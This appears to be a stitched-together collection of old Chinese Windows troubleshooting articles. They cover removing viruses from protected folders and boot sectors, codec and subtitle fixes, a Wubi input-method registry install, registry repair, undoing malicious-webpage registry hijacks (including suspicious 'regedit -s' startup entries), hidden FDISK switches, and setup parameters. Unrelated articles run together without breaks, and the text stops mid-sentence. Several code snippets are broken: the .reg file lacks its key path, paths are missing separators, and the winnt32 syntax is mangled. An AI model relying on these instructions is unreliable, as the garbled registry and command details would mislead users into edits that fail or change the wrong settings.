<BR><BR>1、带毒文件在\Temporary Internet Files目录下。 <BR><BR>由于这个目录下的文件,Windows会对此有一定的保护作用(未经证实)。所以对这个目录下的带毒文件即使在安全模式下也不能进行清除,对于这种情况,请先关闭其他一些程序软件,然后打开IE,选择IE工具栏中的"工具"\"Internet选项",选择"删除文件"删除即可,如果有提示"删除所有脱机内容",也请选上一并删除。 <BR><BR>2、带毒文件在\_Restore目录下,或者System Volume Information目录下。 <BR><BR>这是系统还原存放还原文件的目录,只有在装了Windows Me/XP操作系统上才会有这个目录,由于系统对这个目录有保护作用。对于这种情况需要先取消"系统还原"功能,然后将带毒文件删除,甚至将整个目录删除也是可以的。 关闭系统还原方法。WindowsMe的话,禁用系统还原,DOS下删除。具体请参考下文: <BR><a href="http://community.rising.com.cn/Forum/msg_read.asp?FmID=33&SubjectID=2028691&page=1" target="_blank" >http://community.rising.com.cn/Forum/msg_read.asp?FmID=33&SubjectID=2028691&page=1</A>。XP关闭系统还原的方法:右键单击“我的电脑”,选“属性”——“系统还原”——在“在所有驱动器上关闭系统还原”前面打勾——按“确定”退出。 <BR><BR>3、带毒文件在.rar、.zip、.cab等压缩文件中。 <BR><BR>现今能支持直接查杀压缩文件中带毒文件的反病毒软件还很少,即使有也只能支持常用的一些压缩格式;所以,对于绝大多数的反病毒软件来说,最多只能检查出压缩文件中的带毒文件,而不能直接清除。而且有些加密了的压缩文件就更不可能直接清除了。 <BR><BR>要清除压缩文件中的病毒,建议解压缩后清除,或者借助压缩工具软件的外挂杀毒程序的功能,对带毒的压缩文件进行杀毒。 <BR><BR>4、病毒在引导区或者SUHDLOG.DAT或SUHDLOG.BAK文件中。 <BR><BR>这种病毒一般是引导区病毒,报告的病毒名称一般带有boot、wyx等字样。如果病毒只是存在于移动存储设备(如软盘、闪存盘、移动硬盘)上,就可以借助本地硬盘上的反病毒软件直接进行查杀;如果这种病毒是在硬盘上,则需要用干净的可引导盘启动进行查杀。 <BR><BR>对于这类病毒建议用干净软盘启动进行查杀,不过在查杀之前一定要备份原来的引导区,特别是原来装有别的操作系统的情况,如日文Windows、Linux等。 <BR><BR>如果没有干净的可引导盘,则可使用下面的方法进行应急杀毒: <BR>(1) 在别的计算机上做一张干净的可引导盘,此引导盘可以在Windows 95/98/ME系统上通过"添加/删除程序"进行制作,但要注意的是,制作软盘的操作系统须和自己所使用的操作系统相同; <BR>(2) 用这张软盘引导启动带毒的计算机,然后运行以下命令: <BR>A:\>fdisk/mbr <BR>A:\>sys a: c: <BR>如果带毒的文件是在SUHDLOG.DAT或SUHDLOG.BAK文件中,那么直接删除即可。这是系统在安装的时候对硬盘引导区做的一个备份文件,一般作用不大,病毒在其中已经不起作用了。 <BR><BR>5、带毒文件的后缀名是.vir、.kav、.kbk等。 <BR><BR>这些文件一般是一些防毒软件对原来带毒的文件做的备份文件,一般情况下,如果确认这些文件已经无用了,那就将这些文件删除即可。 <BR><BR>6、带毒文件在一些邮件文件中,如dbx、eml、box等。 <BR><BR>有些防毒软件可以直接检查这些邮件文件中的文件是否带毒,但往往不能对这些带毒的文件直接的进行操作,对于一些邮箱中的带毒的信件,可以根据防毒软件提供的信息找到那带毒的信件,删除信件中的附件或者删除该信件;如果是eml、nws一些信件文件带毒,可以用相关的邮件软件打开,确认该信件及其附件,然后删除相关内容。一般有大量的eml、nws的带毒文件的话,都是病毒自动生成的文件,建议都直接删除。 <BR><BR>7、文件中有病毒的残留代码。 <BR><BR>这种情况比较多见的就是带有CIH、Funlove、宏病毒(包括Word、Excel、Powerpoint和Wordpro等文档中的宏病毒)和个别网页病毒的残留代码,通常防毒软件对这些带有病毒残留代码的文件报告的病毒名称后缀通常是int、app等结尾,而且并不常见,如W32/FunLove.app、W32.Funlove.int。一般情况下,这些残留的代码不会影响正常程序的运行,也不会传染,如果需要彻底清除的话,要根据各个病毒的实际情况进行清除。 <BR><BR>8、文件错误。 <BR><BR>这种情况出现的并不多,通常是某些防毒软件将原来带毒的文件并没有很干净地清除病毒,也没有很好的修复文件,造成文件无法正常使用,同时造成别的防毒软件的误报。这些文件可以直接删除。 <BR><BR>9、加密的文件或目录。 <BR><BR>对于一些加密了的文件或目录,请在解密后再进行病毒查杀。 <BR><BR>10、共享目录。 <BR><BR>这里包括两种情况:本地共享目录和网络中远程共享目录(其中也包括映射盘)。遇到本地共享的目录中的带毒文件不能清除的情况,通常是局域网中别的用户在读写这些文件,杀毒的时候表现为无法直接清除这些带毒文件中的病毒,如果是有病毒在对这些目录在写病毒操作,表现为对共享目录进行清除病毒操作后,还是不断有文件被感染或者不断生成病毒文件。以上这两种情况,都建议取消共享,然后针对共享目录进行彻底查杀,恢复共享的时候,注意不要开放太高的权限,并对共享目录加设密码。对远程的共享目录(包括映射盘)查杀病毒的时候,首先要保证本地计算机的操作系统是干净的,同时对共享目录也有最高的读写权限。如果是远程计算机感染病毒的话,建议还是直接在远程计算机进行查杀病毒。特别的,如果在清除别的病毒的时侯都建议取消所有的本地共享,再进行杀毒操作。在平时的使用中,也应注意共享目录的安全性,加设密码,同时,非必要的情况下,不要直接读取远程共享目录中的文件,建议拷贝到本地检查过病毒后再进行操作。 <BR><BR>11、光盘等一些存储介质。 <BR><BR>对于光盘上带有的病毒,不要试图直接清除,这是神仙也做不到的事情。同时,对另外一些存储设备查杀病毒的,也需要注意其是否处于写保护或者密码保护状态。 <BR><BR>引导型病毒的消毒原理 <BR><BR><BR>1.引导型病毒感染时的攻击部位有:<BR>(1)硬盘主引导扇区。<BR>(2)硬盘或软盘的BOOT扇区。<BR>(3)为保存原主引导扇区、BOOT扇区,病毒可能随意地将它们写入其他扇区,而毁坏这些扇区。<BR>(4)引导型病毒发病,执行破坏行为造成种种损坏。 <BR><BR>2.硬盘主引导扇区染毒,是可以修复的。<BR>(1)用元毒软盘启动系统。<BR>(2)寻找一台同类型、硬盘分区相同的无毒机器,将其硬盘主引导扇区写入一张软盘中。<BR>(3)将此软盘插入染毒机器,将其中采集的主引导扇区数据写入染毒硬盘,即可修复。 <BR><BR>3.硬盘、软盘BOOT扇区染毒也可以修复。<BR>寻找与染毒盘相同版本的无毒系统软盘,执行SYS命令,即可修复。 <BR><BR>4.引导型病毒如果将原主引导扇区或BOOT扇区覆盖式写入根目录区,被覆盖的根目录区完全损坏,不可能修复。 <BR><BR>5.如果引导型病毒将原主引导扇区或BOOT扇区覆盖式写入第一FAT表时,第二FAT表未破坏,则可以修复。可将第FAT表复制到第一FAT表中。 <BR><BR>6.一般而言,引导型病毒占用的其他部分存储空间,只有采用“坏簇”技术和“文件结束簇”技术占用的空间需要收回。 <BR><BR>文件型病毒的消毒原理 <BR><BR>除了覆盖型的文件型病毒之外,其他感染COM型和EXE型的文件型病毒都可以被清除干净。 因为病毒是在基本保持原文件功能的基础上进行传染的,既然病毒能在内存中恢复被感染文件的代码并予以执行, 则也可以仿照病毒的方法进行传染的逆过程—将病毒清除出被感染文件,并保持其原来的功能。 对覆盖型的文件则只能将其彻底删除,没有挽救原来文件的余地了。 <BR><BR>如果已中毒的文件有备份的话,当然是把备份的文件拷贝回去就可以了,如果没有的话就比较麻烦了。 执行文件若加上免疫疫苗的话,遇到病毒的时候,程序可以自行复原;如果文件没有加上任何防护的话, 就只能够靠解毒软件来解,不过用解毒软件来解毒不保证能够完全复原,有可能会越解越糟,杀完毒之后文件反而不能执行。因此,用户必须靠自己平日勤备份自己的资料。 <BR><BR>由于某些病毒会破坏系统数据,如目录和文件分配表FAT,因此在清除完计算机病毒之后,系统要进行维护工作。病毒的清除工作与系统的维护工作往往是分不开的。 视频播放的新问题全面解析 <BR><BR><BR><BR><BR><BR>宽带的普及使在线点播视频成为可能,宽带的普及也让曾经备受网友们喜爱的RMVB视频逐渐被DVDRip视频所取代。DVDRip视频以其和DVD相差无几的清晰程度,受到很多影迷的欢迎。不过,由于这种格式需要编码支持,各种编码在不同的工作环境下表现不一,此外还需要字幕外挂工具等的协同工作,因此播放DVDRip格式的影片有时会出现一些奇怪的问题。在本文中,笔者就和大家来谈谈视频播放的新问题及其解决方法。<BR><BR>正确选择编码插件和播放软件<BR><BR>现在的AVI除了最老的Windows就支持的格式外,还有用Divx和Xvid编码及直接用MPEG4压缩成的AVI格式视频。一般来说,高版本Windows媒体播放器已经自动支持MPEG4格式,而且在连线状态下它会自动下载Divx和Xvid的编码。不过Windows媒体播放器8.0以下的版本没有亮度调节功能,很多AVI文件播放时无法选择播放进度,或是选择播放进度后只有声音无图像;9.0版本对AVI格式兼容性要求过高,编码稍微错误的AVI文件就无法播放。<BR><BR>以笔者的经验,用Divx5.1+Xvid+AC3解码(这些插件都可在Shooter.com.cn找到)是最佳组合。建议不要装FFSHOW这类号称一专多能的插件,有时会遇到播放时只有声音,图像变成一大块青色或粉红色块的问题。此外,各种插件编码之间会互相影响——如果你安装了某些编码播放AVI文件时遇到问题,卸载后再安装Divx5.1+Xvid+ AC3,也未必能恢复正常,你可能需要重新安装操作系统。<BR><BR>至于播放软件,由于至今也没一个兼容所有文件格式的软件,因此建议的组合是Windows媒体播放器+第三方播放软件(如金山影霸2003、WinDVD等)。Windows媒体播放器用来播放ASF、WMV等格式的文件,第三方播放软件用来播放RM等其他格式的文件。<BR><BR>正确处理字幕问题<BR><BR>1. 挑选中文字幕<BR><BR>绝大多数DVDRip视频都采用外挂字幕的形式,字幕文件有SRT、SSA、SUB三种格式。SUB是未经OCR识别的字幕,本质还是一串图形,需要IDX文件的支持;SRT和SSA 则是文字格式的字幕,只需要单独一个文件即可使用,文件一般仅有几十KB,便于传播。外挂的字幕文件往往不是纯中文的,有时有英文和中文甚至日文、法文等多种选择,默认情况下一般播放英文字幕。如果你依赖播放软件本身的挑选字幕功能,可能会出现无法正确选择中文字幕的现象。因此,我们应该安装VobSub这个专门的字幕文件工具。<BR><BR>VobSub除了能在播放时自动打开字幕文件外,还具备选择字幕类型的功能。安装VobSub后,播放DVDRip格式的AVI文件时,我们会在任务栏的系统托盘区看见绿色的小图标,用鼠标双击这个小图标打开如图所示的对话框,在“Main”选项卡下的“language”下面,我们可以选择字幕语言。一般简体中文字幕会带有Chinese、cn、gb等字样,而big5、traditional Chinese等则是繁体中文字幕。需要注意的是,字幕文件名称必须和视频文件名称一致,否则播放视频文件时VobSub不会自动播放字幕文件。<BR><BR><BR><BR>2. 解决字幕不同步的问题<BR><BR>由于DVDRip可能是由不同组织用不同的DVD版本做出来的,因此可能会出现字幕不同步的情况。在VobSub中,我们可以切换到“Timing”选项卡,调整第一个对话框中的数值,数值越大,字幕出现的速度就越快,反之则越慢。自己慢慢揣摩适当的比例吧。当然,如果字幕和对白相差太远,建议大家去下载适合当前DVDRip版本的字幕文件。<BR><BR>提示:字幕改了Timing后,应该重新启动播放软件。如果只是暂时停止了播放,可能会发生程序响应极慢或者是死机的现象。<BR><BR><BR><BR>视频播放常见问题分析<BR><BR>不是所有视频文件安装好编码插件后就能一帆风顺地观看下去,有些视频文件源文件亮度就不够,或是用户的显示器使用时间太长,亮度已经下降很多,在这些情况下需要手工调节播放的亮度。<BR><BR>1. 亮度调节、截图等问题<BR><BR>如果你用的是Windows媒体播放器8.0以上版本,可以在播放视频文件时单击“查看→正在播放工具→视频设置”,然后拖动相应的滑块调整画面亮度及色彩等选项(如图)。如果是使用《金山影霸2003》,在播放的时候把鼠标指针移动到屏幕最顶端,就会出现亮度、对比度及色彩的调节选项。当然,你也可以用PowerStrip等专业工具来调节显示的亮度和对比度。<BR><BR><BR><BR>视频文件的截图相对来说比较容易,但由于视频画面是通过DirextX输出的,因此用键盘上的Print Screen功能键无法截取视频画面,我们需要用版本较高的第三方抓图工具,如HyperSnap 4、SnagIt 6等等。<BR><BR>2. 画面倒转了怎么办<BR><BR>有些特殊编码的文件在播放时可能会出现画面倒转的问题(如图2),也有可能是由于该文件没有字幕文件造成的:我们可以把其他文件的字幕复制到这个目录,然后把名称改成相同的,再按上面的操作将字幕出现的速度调快一些,一般就可正常播放了。我们也可以使用播放软件本身支持的画面倒转功能来解决问题:假如我们用的是《金山影霸2003》,可以在播放画面上单击鼠标右键,选择“图像翻转播放”。如果你用的是Windows媒体播放器,且已经开启了VobSub,可以用鼠标右键单击任务栏上系统托盘区的绿色箭头,选择“Flipped Picture”命令即可。<BR><BR>3. 轻松播放RMVB格式文件<BR><BR>我们可以将RMVB格式文件的后缀直接改为RM,当作RM格式来播放。如果更改文件后缀名后无法正确播放,可以下载Real One Player的RMVB升级补丁。《金山影霸2003》也有一个专门的RMVB升级包,安装后就可以直接播放RMVB文件了。<BR><BR>最后要提醒大家的是,最新的软件和编码不一定效果最好,有时会遇上兼容性问题。比如DirectX 9就和部分电视卡有冲突。大家最好根据自己的软、硬件环境来选择配套的播放工具及编码支持,对于必须要Windows Media Player 9才能播放的影片,笔者的建议是安装多操作系统,各自安装不同的播放软件。此外,大家可以多关注射手网(Shooter.com.cn),那上面有最新的编码插件和播放软件。 在WINXP中安装王码五笔<BR><BR><BR>Windows XP中没有自带王码五笔,对用惯了王码五笔的朋友来说简直就是一场“灾难”,想到有着丰富词汇、方便自造句功能的王码五笔,朋友们是不是梦想着给Windows XP重新插上这个输入的“翅膀”! <BR><BR> 有方法介绍可以利用Office安装盘中输入法安装程序完成王码五笔的安装。但手头上没有Office 2002安装盘的朋友,总不能为一个输入法去买一张Office安装盘吧!那该怎么办呀?笔者以安装王码五笔86版为例,介绍一个“赤手空拳”在Windows XP中进行安装的步骤: <BR><BR> 首先,我们在装好了86版五笔输入法的操作系统中找到这三个文件:Winwb86.mb、Winwb86.ime、Winwb86.emb(自造词句库文件),将它们拷贝带回(文件不大,一张软盘足够了)。 <BR><BR> 然后,再把它们拷贝到要安装王码五笔的电脑中的系统目录下(如Windows XP安装在C盘,应为C:windowssystem32)。 <BR><BR> 接着另建一个记事本文件,输入如下内容(注意:字母、符号均为英文状态)。 <BR><BR> Windows Registry Editor Version 5.00 <BR><BR> <BR><BR> “IME File”=“WINWB86.IME” <BR><BR> “Layout Text”=“中文 (简体) - 王码五笔型86版” <BR><BR> “Layout File”=“kbdus.dll” <BR><BR> 取名为WUBI,后缀为REG。 <BR><BR> 最后,双击WUBI.REG文件,把其导入到注册表中。重启后,到输入法设置中仔细看看,是不是发现可以进行王码五笔的添加啦。 找回丢失的输入法标志<BR><BR>由于误操作或非正常关机等原因导致任务栏上的输入法标志不见了,这时该怎么办呢?<BR><BR>一般来说,我们打开“控制面板”的“输入法”对话框,将“启动任务栏上的指示器”一项勾上即可解决问题。但有时这样做并没有效果,这时我们可以尝试修改注册表。首先运行“regedit”,展开“HKEY_CURRENT_USER/keyboard/preload”分支,在其下新建一个字符串值,命名为“1”,并将它对应的键值改为“00000409”。最后关闭注册表,重新启动系统就可以了。<BR><BR>另外,系统中的“internat.exe”文件丢失也会导致出现这个问题。我们可以从其他电脑中复制一个相同的文件,把它放入Windows安装目录?如果系统为Win 2000/XP,就放入安装目录下的System32文件夹?,然后运行注册表?展开“HKEY_LOCAL_MACHINE/SoftwareMicrosoft/Windows/CurrentVersion/Run”分支,在右边新建一个字符串值,把键值名和键值都改为“internat.exe”。最后关闭注册表,重新启动系统即可。 重启时不可忽视的硬盘自检<BR><BR>很多拥有电脑的朋友在Windows死机后,重新启动进入系统时,会吝啬硬盘自检的数秒钟时间而直接跳过。认为硬盘非法关机后重启时的自检程序多余,其实这样很不好,有时一些小毛病也是这样出现的。<BR><BR>前一阵子,笔者在一朋友家中就碰到了一件事。当日朋友一边打“魔兽争霸”,一边用“豪杰音频解霸”听音乐,玩着玩着“魔兽争霸”提示“非法操作”关闭了,然后又出现一提示“OUT OF MEMORY”。一看就知道是由于同时进行两个较大的任务,导致系统资源不足造成的。在重新启动后,朋友嫌费时就跳过了硬盘自检,进入游戏没一会儿,又非法操作了。朋友怀疑是前几日刚更新了显卡的最新驱动程序造成的,重新安装好显卡自带的驱动程序,重启后进入游戏依然故障。后来分析,朋友爱机的内存是256MB的,虚拟内存空间应该不会有问题,那么问题多半是出在了系统交换区空间不足上了。随即进行硬盘查错程序,发现所有逻辑驱动器内都发现了错误。扫描完成后,重启后老老实实的进行了硬盘自检,进入系统后再次进入游戏,问题不再出现。<BR><BR>通过这次故障,我们大家都应该认识到开机时硬盘自检的重要性,不要为了那几秒的时间而给自己的爱机埋下“隐患”。 注册表损坏之症状和修复<BR><BR>indows的注册表实际上是一个数据库,它包含了五个方面的信息,即PC的全部硬件、软件设置、当前配置、动态状态及用户特定设置等内容,主要储存在C:\windows下的system.dat和user.dat两个文件中。由此可见注册表是Windows系统的命根子,稍有闪失,后果严重。注册表文件损坏而不能正常启动系统或运行应用程序的情况经常出现,那么注册表损坏一般存在哪些症状呢?<BR><BR>1、当使用过去正常工作的程序时,得到诸如“找不到*.dll”的信息,或其他表明程序部分丢失和不能定位的信息。<BR><BR>2、应用程序出现“找不到服务器上的嵌入对象”或“找不到OLE控件”这样的错误提示。<BR><BR>3、当单击某个文档时,Windows给出“找不到应用程序打开这种类型的文档”信息,即使安装了正确的应用程序且文档的扩展名(或文件类型)正确。<BR><BR>4、“资源管理器”页面包含没有图标的文件夹、文件或者意料之外的奇怪图标。<BR><BR>5、“开始”菜单或“控制面板”项目丢失或变灰而处于不可激活状态。<BR><BR>6、网络连接不能建立或不再出现在“拨号网络”中或“控制面板”的“网络”中。<BR><BR>7、不久前工作正常的硬件设备不再起作用或不再出现在“设备管理器”的列表中。<BR><BR>8、Windows系统根本不能启动,或仅能以安全模式或MS-DOS模式启动。<BR><BR>9、Windows系统显示“注册表损坏”这样的信息。<BR><BR>10、启动时,系统调用注册表扫描工具对注册表文件进行检查,然后提示当前注册表已损坏,将用注册表的备份文件进行修复,并要求重新启动系统。而上述过程往往要重复数次才能进入系统。其实此乃系统的误报,此时的注册表并没有损坏,倒是你的内存条或硬盘值得好好检查一下,这是硬件故障造成的假象。<BR><BR>以上罗列了注册表损坏的十种症状,除第十项外,前九项都是可以简单修复的,前提是有注册表文件备份。备份的方法也不难,在机器工作正常时,运行注册表编辑器regedit.exe,选择“注册表/导出注册表文件”,接下来“导出范围”选择“全部”,“存为类型”选择“注册表文件”,最后任取一个文件名(如“backup”)就行了;也可以直接拷贝“system.dat”和“user.dat”两个文件进行备份。修复时进入DOS模式状态(开机时按“F8”调出多重引导菜单,选择“Command Prompt Only”),在提示符后键入“regedit/c backup.reg”回车即可。倘若没有备份,我们可以利用Windows的自动备份进行修复,同样进入DOS实模式状态,键入“scanreg /restore”,进入菜单界面,选择一个备份文件,稍等片刻即可。 道高一尺,魔高一丈,恶意网页的卑鄙手段可谓是“推陈出新”啊。用一些简单的注册表修复方法后,已经不能完全解决问题了。如果你的注册表在恢复后又回到了被修改的老样子,不妨看看是否是以下原因引起的呢?<BR> <BR><BR><BR> 1.修改注册表禁止命令形式的修改,目的是不让用户通过注册表修复回去。 <BR><BR> 最通常的修改是锁住注册表,还有破坏关联:比如.reg,.vbs,.inf等<BR><BR> 关于解锁注册表,在前面已经介绍了方法,至于被修改关联,只要我前面说的注册表修改的方法里的关联还 能用,就可以用其中的任意一个,但如果.reg,.vbs,.inf都被修改了,怎么办啊?,也不用怕,把 .exe 后缀改为.com后缀,我一样可以编辑注册表,.com也被改了,怎么办?没那么狠吧,行,我再改后缀为.scr 。嘿嘿,一样还可以修改。 <BR><BR> 最好的最简单的办法,马上重新启动,按F8进入DOS下,敲入SCANREG/RESTORE,选择以前的正常时的注册表 还原就可以,注意了,一定要选择没被修改时的注册表!如果发现连scanreg都被删除了(一些网站就是这么 狠的,用A盘COPY一个scanreg.exe到COMMAN下即可 <BR><BR> 有必要在这里说说常见的文件关联的默认值 <BR><BR> 正常的exe关联为 <BR><BR> 默认的键值为:"%1 %*" 将此关联改回去即可使用exe文件 <BR><BR> 2.修改注册表后留后门,目的让你修改注册表好像成功,重新启动后又恢复到被修改的状态。<BR><BR> 这主要是在启动项里留了后门,大家可以打开注册表到(也可以用一些工具比如优化大师等来察看)<BR><BR>HKCU\Software\Microsoft\Windows\CurrentVersion\Run <BR>HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce <BR>HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices <BR>HKCU\Software\Microsoft\Windows\CurrentVersionRun- <BR><BR> 看看有没有可疑的启动项目,这一点最多朋友忽略,哪些启动可疑呢? <BR><BR> 我这里给出几个大家需要注意的,启动项里键值有出现.hml和.htm后缀的,最好都去掉,还有有.vbs后缀的 启动项也去掉,还有一个很重要的,如果有这一个启动项,出现有类似键值的,比如:<BR><BR> system 键值是regedit -s c:\windows……请注意,这个regedit -s 是注册表的一个后门参数,是用来导 入注册表的,这样的选项一定要去掉 <BR><BR> 还有一类修改会在c:\windows\产生.vbs后缀的文件,或是.dll文件,其实.dll文件实际是.reg文件(乔装成DLL文件的恶意网页病毒) <BR><BR> 此时你要看看c:\windows\win.ini文件,看看load=,run=,这两个选项后面应该是空的,如果有其他程序 修改load=,run=,将=后面程序删除,删除前看看路径和文件名,删除后在到system下删除对应的文件 <BR><BR> 还有一种方法,大家如果屡次修改重启又恢复回去,可以搜索C盘下所有的.vbs文件,可能有隐藏的,用记 事本打开,看到里面有关于修改注册表的都把它删除或保险起见把后缀改掉,你可以按中恶意网页的病毒的 时间来搜索文件:) <BR><BR> 下面的这个漏洞大家非常值得注意,很多朋友说,你说的方法我都试了,启动项里绝对没有什么可疑的,也没有什么vbs文件,呵呵,大家在启动IE时还有一个陷阱,就是IE主界面的工具的菜单里的广告,一定要去 掉,因为这些会在你启动IE时启动,所以你修改完其他的先别着急打开IE窗口,否则白费力气,方法:打开注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions看到广告就删,别留情!<BR><BR> 一个很重要的问题,在中了恶意网页的陷阱后一定要先清空IE所有临时文件,切记! <BR><BR> 说了那么多,那如何防御这类恶意网页呢? <BR><BR> 一个一劳永逸的方法,把F935DC22-1CF0-11D0-ADB9-00C04FD58A0B这个ID删掉在注册表的路径为HKEY_CLASSES_ROOT\CLSID\{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}<BR><BR> 记住,看清楚了再删除,千万别删错其他。删掉这个F935DC22-1CF0-11D0-ADB9-00C04FD58A0B对系统不会有影响的。 <BR><BR> 在IE的选单栏中选择“工具”→“Internet选项”,在弹出的对话框中切换到“安全”标签,选择“ Internet”后点击“自定义级别”按钮,在“安全设置”对话框中,把“ActiveX控件和插件”、“脚本” 中的相关选项全部选择“禁用”或“提示”即可。但如果选择了“禁用”,一些正常使用ActiveX和脚本的 网站可能无法完全显示。建议选择:提示。遇到警告时,看看该网站的原代码,如果发现有出现 Shl.RegWrite等的代码,就不要去了,如果是加密的原代码,不是自己熟悉的网站也不要去,如果连右键都用不了的,也要小心为好(看看原码有什么所谓啊,除非有什么好的JAVA或是恶意代码) <BR><BR> 对于Windows98用户,请打开C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP,把其中的“ActiveXComponent.class删掉,对于WindowsMe用户,请打开C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP,把其中的“ActiveXComponent.class”删掉,这些删掉不会影响正常浏览网页<BR><BR> 在Windows 2000/XP,可以通过禁用“远程注册表服务”来阻挡部分恶意脚本。具体方法是:在“控制面板”→“管理工具”→“服务”中右键单击“Remote Registry Service”,在弹出选单中选择“属性”,打开属性对话框,在“General”内将“Startup ype”设为“Disabled”。这样也可以拦截部分恶意脚本程序。 <BR><BR> 嘿嘿,不用IE。用其他浏览器也可以……大家在中了恶意网页的陷阱后,先不要立即重新启动计算机,到启动项里看看,有没有什么危险的启动项,不如deltree之类的。 系统相关类<BR><BR><BR>FDISK中隐藏的诱惑<BR><BR>相信大家对FDISK已经非常熟悉了,虽然FDISK有英文界面或不支持大容量硬盘分区等缺点,但是FDISK仍然是许多电脑爱好者的首选分区程序。鉴于分区操作是对磁盘结构的重新划分,具有一定的危险性,所以该程序的全部参数开关并没有全部公布出来,造成FDISK的功能在一定程度上受到了限制。笔者通过长期的资料收集和实践,得到了一部分关于FDISK的未公开参数开关,在此介绍给大家,希望朋友们能更好地利用FDISK。<BR><BR>FDISK程序的命令行格式通用语法为:FDISK /参数开关,下面是它们的具体功能说明:<BR><BR>/ACTOK<BR>参数功能:不检查磁盘表面是否有坏扇区。它可以在硬盘分区时不检测磁盘表面是否有坏区,直接进行分区。<BR><BR>/CMBR<BR>参数功能:重新建立指定磁盘的主引导记录功能说明。其操作等同于/MBR参数,不同之处是可以指定磁盘。<BR><BR>/EXT<BR>参数功能:在当前磁盘上建立扩展分区(用来随后建立逻辑磁盘分区)。<BR><BR>/FPRMT<BR>参数功能:在交互模式下询问FAT16或FAT32的使用。当加上/FPRMT参数时不会出现是否支持大容量硬盘的询问画面,而是在每次建立一个新的分区时询问使用FAT16还是FAT32格式,这样我们就可以更自由地划分每一个盘的格式,当然现在不是很实用了,所以大家看过就是。<BR><BR>/LOG<BR>参数功能:建立磁盘逻辑分区,用/LOG来建立逻辑磁盘,/LOG必须和/EXT同时使用。<BR><BR>/LOGO<BR>参数功能:使用FAT16格式建立磁盘逻辑分区。<BR><BR>/MBR<BR>参数功能:重新建立主磁盘的主引导记录(Master Boot Record)。卸载WindowsNT或Windows2000后消除在主引导记录上记载的系统启动选择;当有病毒感染主引导记录时,用来清除病毒相当有效。<BR><BR>/PRI<BR>参数功能:在磁盘上建立主分区,分区会自动被设定为激活形式。<BR><BR>/PRIO<BR>参数功能:使用FAT16格式建立主分区并设定为激活形式。<BR><BR>/Q<BR>参数功能:使用/Q参数将不用在改变分区表后重新启动计算机,这也是一项比较实用的功能,如果大家还需要在运行FDISK之后运行别的软件,记住用这个参数。<BR><BR>/STATUS<BR>参数功能:当磁盘扩展分区上没有进行逻辑分区时,扩展分区不会被显示出来。<BR><BR>/X<BR>参数功能:使用/X参数将不会产生带有LBA属性的分区。<BR><BR>这些参数中又以/ACTOK,/MBR,/Q 这几个最常用和实用。总的来讲,这些参数会让FDISK程序更全面,但是这些隐藏参数的危险系数也很大,诸位还是要谨慎使用。 本文介绍了如何在从 Windows NT 4.0 升级至 Windows Server 2003 的计算机上应用注册表“访问控制列表”(ACLs) 和文件系统 ACL。 <BR><BR>将基于 Windows NT 4.0 的计算机升级至 Windows Server 2003 时,“Windows 安装程序”不会更改该注册表和文件系统 ACL。Windows Server 2003 允许更高级别的安全性,并且它处理注册表和文件系统权限的方式有别于 Windows NT 4.0。Microsoft 建议您将 Windows 2003 ACL 应用到从 Windows NT 4.0 升级的计算机上。 <BR><BR>要应用注册表和文件系统 ACL,您可以使用“安全配置和分析”管理单元。请注意,您必须是“Administrators”组的成员,才能执行此过程。<BR><BR>如何在从 Windows NT 4.0 升级至 Windows Server 2003 的计算机上应用默认的系统安全设置以“Administrator”或“Administrators”组成员的身份登录。 <BR><BR>单击开始,单击运行,在打开 框中键入 mmc,然后单击确定。 <BR><BR>在文件菜单上,单击“添加/删除管理单元”。 <BR><BR>单击添加、“安全配置和分析”、添加,单击关闭,然后单击确定。<BR><BR>在控制台树中,右键单击“安全配置和分析”,然后单击打开数据库。<BR><BR>指定数据库的名称(例如,upgdbase)和位置,然后单击打开。 <BR><BR><BR>在屏幕上出现的导入模板 对话框中,单击设置 Security.inf,然后单击打开。<BR><BR>右键单击“安全配置和分析”,然后单击现在分析计算机。<BR><BR>在屏幕上出现的执行分析 对话框中,接受“错误日志文件路径”框中显示的默认日志文件路径,或指定所需的位置,然后单击确定。 <BR><BR>将对该模板安全设置与现有的计算机设置进行比较。 <BR><BR>备注:此时,不会对计算机进行任何更改。此过程的结果表明模板中的安全设置与实际系统设置有何区别。 <BR><BR>完成分析时,展开控制台树中的各个组件,例如:帐户策略、本地策略、事件日志、受限制的组,以及系统服务。<BR><BR>对于在第 10 步中展开的每个组件,请在策略 列的右窗格中查看它的安全属性项,而且要注意以下几点: <BR><BR>带有绿色选中标记的项表示当前计算机设置与数据库中的安全设置相同。<BR><BR>带有红色“x”的项表示当前计算机设置与数据库中的安全设置不同。<BR><BR>如果未显示绿色选中标记或红色“x”,则未在模板中定义此安全属性,并且也没对其进行分析。<BR><BR>如果您要添加或修改数据库设置,请右键单击要添加或修改的安全属性,然后单击属性。单击“在数据库中定义这个策略”复选框,将其选中(如果尚未选中),对策略设置进行所需更改,然后单击确定。<BR><BR>备注:数据库设置 列会显示模板中包含的安全设置,计算机设置 列会显示计算机的当前设置。<BR><BR>要将计算机配置为使用数据库中的安全设置,请右键单击“安全配置和分析”,然后单击现在配置计算机。<BR><BR>在屏幕上出现的配置系统 对话框中,接受默认的路径和日志文件名,或者,键入需要的路径和文件名,然后单击确定。<BR><BR>安全数据库配置会应用于计算机。<BR><BR>备注:如果该数据库项目和计算机上的现有安全配置之间存在冲突,除非您在配置计算机之前消除二者之间的区别,否则将改写现有项目。 WIN XP 安装参数大揭密<BR><BR>我们先来看看winnt32.exe有哪些参数可以使用。<BR><BR>winnt32.exe位于i386目录里面。这个文件可以直接运行于windows下面,其具体参数有:<BR><BR>安装或升级到 Windows XP。在运行 Windows 95、Windows 98、Windows Me、WindowsNT、Windows 2000 或 Windows XP 的计算机上,可以从命令提示符中运行 winnt32。<BR><BR>语法:<BR><BR>winnt32 :] ] :]<BR><BR>参数:<BR><BR>/checkupgradeonly<BR><BR>检查计算机与 Windows XP 的升级兼容性。如果在使用该选项时使用了/unattend,则不需要用户输入。否则,结果将显示在屏幕上,并且可以用您指定的文件名保存它们。默认的文件名为 Upgrade.txt(位于systemroot 